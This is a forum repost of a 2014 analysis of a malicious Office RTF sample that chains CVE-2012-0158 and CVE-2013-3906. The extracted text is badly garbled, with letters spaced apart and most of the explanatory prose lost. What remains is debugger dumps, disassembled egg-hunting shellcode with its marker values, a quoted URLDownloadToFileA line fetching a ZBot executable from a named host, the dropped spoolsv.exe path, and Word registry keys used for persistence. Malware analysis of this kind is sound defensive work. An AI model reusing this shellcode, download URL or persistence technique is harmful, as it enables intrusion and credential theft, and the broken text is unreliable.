[7962] 2014-04-16_Office”组合”式漏洞攻击样本分析

文档创建者:s7ckTeam
浏览次数:8
最后更新:2025-01-17
2014-04-16_Office”组合”式漏洞攻击样本分析 O f f i c e   F r e e B u f   2 0 1 4 - 0 4 - 1 6 b y   h c l ,   n i n e 8   o f   c o d e   a u d i t   l a b s   o f   v u l n h u n t . c o m 1   C V E - 2 0 1 4 - 1 7 6 1 R T F C V E - 2 0 1 4 - 1 7 6 1 R T F C V E - 2 0 1 2 - 0 1 5 8 C V E - 2 0 1 3 - 3 9 0 6 m a c f e e B l o g R T F C V E - 2 0 1 0 - 3 3 3 3 C V E - 2 0 1 3 - 3 9 0 6 2   2 . 1   C V E - 2 0 1 2 - 0 1 5 8 1 )   0 1 5 8 0 1 5 8 0 x F 0 0 e a x = 0 0 1 2 1 7 0 0   e b x = 0 b 7 a 0 0 e 0   e c x = 7 c 9 3 0 0 3 d   e d x = 0 e f 1 0 0 2 0   e s i = 0 8 e c e 6 b c   e d i = 0 0 0 0 0 0 0 0 e i p = 2 7 5 a 2 7 3 8   e s p = 0 0 1 2 1 6 d c   e b p = 0 0 1 2 1 7 0 8   i o p l = 0                   n v   u p   e i   p l   n z   a c   p o   n c c s = 0 0 1 b     s s = 0 0 2 3     d s = 0 0 2 3     e s = 0 0 2 3     f s = 0 0 3 b     g s = 0 0 0 0                           e f l = 0 0 0 0 0 2 1 2 M S C O M C T L ! D l l G e t C l a s s O b j e c t + 0 x b 4 5 1 : 2 7 5 a 2 7 3 8   e 8 6 3 f d f f f f             c a l l         M S C O M C T L ! D l l G e t C l a s s O b j e c t + 0 x b 1 b 9   ( 2 7 5 a 2 4 a 0 )   0 : 0 0 0 >   d d   e s p 0 0 1 2 1 6 d c     0 0 1 2 1 7 0 0   0 b 7 a 0 0 e 0   0 0 0 0 0 f 0 0   0 0 0 0 0 0 0 0 0 0 1 2 1 6 e c     0 8 e c e 6 b c   0 b 7 a 0 0 e 0   6 a 6 2 6 f 4 3   0 0 0 0 0 0 6 4   0 : 0 0 0 >   k b C h i l d E B P   R e t A d d r     A r g s   t o   C h i l d W A R N I N G :   S t a c k   u n w i n d   i n f o r m a t i o n   n o t   a v a i l a b l e .   F o l l o w i n g   f r a m e s   m a y   b e   w r o n g . 0 0 1 2 1 7 0 8   2 7 5 e 7 2 7 b   0 8 e c e 6 b c   0 b 7 a 0 0 e 0   0 0 0 0 0 0 0 0   M S C O M C T L ! D l l G e t C l a s s O b j e c t + 0 x b 4 5 1 0 0 1 2 1 7 3 0   2 7 5 e 7 5 c 2   0 8 e c e 6 b c   0 b 7 a 0 0 e 0   0 b 7 a 0 0 e 0   M S C O M C T L ! D L L G e t D o c u m e n t a t i o n + 0 x c f 1   0 : 0 0 0 >   p e a x = 0 0 0 0 0 0 0 0   e b x = 0 b 7 a 0 0 e 0   e c x = 7 c 9 3 0 0 3 d   e d x = 0 0 1 4 0 6 0 8   e s i = 0 8 e c e 6 b c   e d i = 0 0 0 0 0 0 0 0 e i p = 2 7 5 a 2 7 3 d   e s p = 0 0 1 2 1 6 d c   e b p = 0 0 1 2 1 7 0 8   i o p l = 0                   n v   u p   e i   p l   z r   n a   p e   n c c s = 0 0 1 b     s s = 0 0 2 3     d s = 0 0 2 3     e s = 0 0 2 3     f s = 0 0 3 b     g s = 0 0 0 0                           e f l = 0 0 0 0 0 2 4 6 M S C O M C T L ! D l l G e t C l a s s O b j e c t + 0 x b 4 5 6 : 2 7 5 a 2 7 3 d   8 b f 0                         m o v           e s i , e a x   0 : 0 0 0 >   k b C h i l d E B P   R e t A d d r     A r g s   t o   C h i l d W A R N I N G :   S t a c k   u n w i n d   i n f o r m a t i o n   n o t   a v a i l a b l e .   F o l l o w i n g   f r a m e s   m a y   b e   w r o n g . 0 0 1 2 1 7 0 8   2 7 6 0 6 e f e   4 a 4 5 4 2 4 7   4 2 4 7 4 6 4 2   2 7 5 f 4 a 6 2   M S C O M C T L ! D l l G e t C l a s s O b j e c t + 0 x b 4 5 6 0 0 1 2 1 7 5 4   2 7 5 e 0 d 6 9   0 0 0 4 0 1 1 0   0 0 0 1 0 0 0 0   0 0 0 1 0 0 0 0   M S C O M C T L ! D l l U n r e g i s t e r S e r v e r + 0 x 6 e c 6 2 )   S h e l l c o d e R O P j m p   e s p E g g   H u n t i n g S h e l l c o d e F l a g 0 × 7 8 7 8 4 7 4 7 0 × 7 8 7 8 4 7 4 7 0 x E 3 E 3 A C A C E g g   H u n t i n g S h e l l c o d e 3 )   0 1 5 8 o b j e c t 2 . 2   C V E - 2 0 1 3 - 3 9 0 6 1 )   C V E - 2 0 1 2 - 0 1 5 8 T I F S t r i p B y C o u n t s 9 v a l u e 0 x F F F F 0 0 B 2 v a l u e v t a b l e c a l l 0 a 0 a 0 a 0 a s h e l l c o d e
2 )   A c t i v e X 1 2 . b i n S h e l l c o d e 0 1 5 8 F l a g E g g   H u n t i n g s h e l l c o d e 3 )   s h e l l c o d e 0 a 0 a 0 a 0 e   e b c 0                         j m p           0 a 0 a 0 9 d 0 0 a 0 a 0 a 1 0   0 a 0 a                         o r             c l , b y t e   p t r   [ e d x ] 0 a 0 a 0 a 1 2   0 a 0 a                         o r             c l , b y t e   p t r   [ e d x ]   0 : 0 0 0 >   u   0 a 0 a 0 9 d 0 0 a 0 a 0 9 d 0   4 3                             i n c           e b x 0 a 0 a 0 9 d 1   4 3                             i n c           e b x 0 a 0 a 0 9 d 2   4 3                             i n c           e b x 0 a 0 a 0 9 d 3   4 3                             i n c           e b x 0 a 0 a 0 9 d 4   4 3                             i n c           e b x   0 a 0 f f a d 4   3 1 d b                         x o r           e b x , e b x 0 a 0 f f a d 6   6 6 8 1 c b f f 0 f             o r             b x , 0 F F F h 0 a 0 f f a d b   4 3                             i n c           e b x 0 a 0 f f a d c   6 a 0 8                         p u s h         8 0 a 0 f f a d e   5 3                             p u s h         e b x 0 a 0 f f a d f   8 b 4 4 2 4 0 8                 m o v           e a x , d w o r d   p t r   [ e s p + 8 ] 0 a 0 f f a e 3   f f d 0                         c a l l         e a x 0 a 0 f f a e 5   8 5 c 0                         t e s t         e a x , e a x 0 a 0 f f a e 7   7 5 e d                         j n e           0 a 0 f f a d 6 0 a 0 f f a e 9   b 8 4 7 4 7 7 8 7 8             m o v           e a x , 7 8 7 8 4 7 4 7 h 0 a 0 f f a e e   8 9 d f                         m o v           e d i , e b x 0 a 0 f f a f 0   a f                             s c a s         d w o r d   p t r   e s : [ e d i ] 0 a 0 f f a f 1   7 5 e 8                         j n e           0 a 0 f f a d b 0 a 0 f f a f 3   a f                             s c a s         d w o r d   p t r   e s : [ e d i ] 0 a 0 f f a f 4   7 5 e 5                         j n e           0 a 0 f f a d b 0 a 0 f f a f 6   8 1 3 f a c a c e 3 e 3         c m p           d w o r d   p t r   [ e d i ] , 0 E 3 E 3 A C A C h 4 )   T I F 2 . 3   E g g   H u n t i n g   S h e l l c o d e 1 )   U R L D o w n l o a d T o F i l e A h t t p : / / a l i e n s t u b . c o m / t i c k e t / c o k e . e x e Z B o t C : D O C U M E ~ 1 L O C A L S ~ 1 T e m p . . A p p l i c a t i o n   D a t a M i c r o s o f t W i n d o w s s p o o l s v . e x e
2 )   S o f t w a r e M i c r o s o f t O f f i c e [ V e r s i o n ] W o r d R e s i l i e n c y D i s a b l e d I t e m s S o f t w a r e M i c r o s o f t O f f i c e [ V e r s i o n ] W o r d R e s i l i e n c y S t a r t u p I t e m s . 3 )   0 × 7 8 7 8 4 7 4 7 0 × 7 8 7 8 4 7 4 7 0 x E 3 E 3 A C A C   O b j e c t : 3 .   Z B o t 访 B h t t p s : / / b - c h a o . c o m / i n d e x . p h p / I n d e x / s h o w _ d e t a i l / S h a 1 / C 0 9 D 8 E C 5 2 9 7 7 3 C B E 4 C 5 E 3 5 1 D C 0 A B D 4 7 2 4 E 2 D C F 3 C 4 .   h t t p : / / b l o g s . m c a f e e . c o m / m c a f e e - l a b s / r t f - a t t a c k - t a k e s - a d v a n t a g e - o f - m u l t i p l e - e x p l o i t s h t t p : / / b l o g . v u l n h u n t . c o m / i n d e x . p h p / 2 0 1 4 / 0 4 / 0 4 / o f f i c e % E 7 % B B % 8 4 % E 5 % 9 0 % 8 8 % E 5 % B C % 8 F % E 6 % B C % 8 F % E 6 % B 4 % 9 E % E 6 % 9 4 % B B % E 5 % 8 7 % B B % E 6 % A 0 % B 7 % E 6 % 9 C % A C % E 5 % 8 8 % 8 6 % E 6 % 9 E % 9 0 /
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则